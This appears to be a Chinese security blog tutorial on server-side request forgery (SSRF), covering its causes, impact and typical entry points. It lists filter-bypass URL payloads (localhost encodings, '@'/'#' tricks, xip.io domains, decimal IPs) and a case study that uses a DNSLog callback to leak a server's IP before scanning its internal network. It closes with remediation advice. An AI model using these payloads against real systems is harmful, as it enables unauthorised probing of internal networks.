淺談SSRF(伺服器請求偽造)
- 2020 年 3 月 10 日
- 筆記
文章源自【位元組脈搏社區】-位元組脈搏實驗室
作者-Beginners
掃描下方二維碼進入社區:
0x01 淺談SSRF(伺服器請求偽造)
第一步,SSRF是怎麼產生的:
SSRF(Server-Side Request Forgery:伺服器端請求偽造) 是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞。一般情況下,SSRF攻擊的目標是從外網無法訪問的內部系統。(正是因為它是由服務端發起的,所以它能夠請求到與它相連而與外網隔離的內部系統)

0x02 SSRF的危害:
1.可以對外網伺服器所在的內網、某些情況下埠的Banner會回顯出來 。
2.攻擊運行在內網或者本地的應用程式。
3.對內網web應用進行指紋識別 。
4.攻擊內外網的web應用。
5.利用file協議讀取本地文件等。


0x03 SSRF漏洞常見出現點:
1.遠程載入圖片
2.遠程下載
3.遠程讀取鏈接內容
4.掃描遠程地址
5.能夠對外發起網路請求的地方
6.請求遠程伺服器資源的地方

0x04 SSRF漏洞繞過:
一:利用本地繞過:
http://127.0.0.1:80 >>> http://127.0.0.1:80
http://localhost:80 >>> http://127.0.0.1:80
http://127.127.127.127 >>> http://127.0.0.1:80
http://127.0.0.3 >>> http://127.0.0.1:80
http://127.0.1.3 >>> http://127.0.0.1:80

二:利用[::]繞過localhost:
http://[::]:80 >>> http://127.0.0.1:80
http://[::1]:80 >>> http://127.0.0.1:80

三:利用#,@繞過:
http://[email protected] >>> http://127.0.0.1:80
http://127.0.0.1#@test.com >>> http://127.0.0.1:80

四:利用特殊域名來繞過:
http://127.0.0.1.xip.io >>> http://127.0.0.1:80
http://www.owasp.org.127.0.0.1.xip.io >>> http://127.0.0.1:80
https://127.0.0.1.nip.io >>> http://127.0.0.1:80

五:利用句號繞過:
http://127。0。0。1 >>> http://127.0.0.1:80

七:利用進位繞過:
http://0177.0.0.1 >>> http://127.0.0.1:80
http://3232235521 >>> http://192.168.0.1
http://3232235777 >>> http://192.168.1.1

八:利用短網址繞過:
http://985.so/jSRg >>> http://127.0.0.1:80

0x05 SSRF利用案例:
第一步,測試過程中,發現如下請求:

第二步,發現存在過濾,構造網址實現繞過:

構造:http://0b55c1.dnslog.cn#@www.test.com 成功繞過


第三步,到DNSLog獲取真實的IP:

第四步,利用獲取的IP批量探測內網主機和埠服務:


第五步,修復方式:
可以採取白名單,限制內網Ip。
對返回內容進行識別。
禁用一些不必要的協議。
統一錯誤資訊,避免用戶可以根據錯誤資訊來判斷遠端伺服器的埠狀態。

通知!
公眾號招募文章投稿小夥伴啦!只要你有技術有想法要分享給更多的朋友,就可以參與到我們的投稿計劃當中哦~感興趣的朋友公眾號首頁菜單欄點擊【商務合作-我要投稿】即可。期待大家的參與~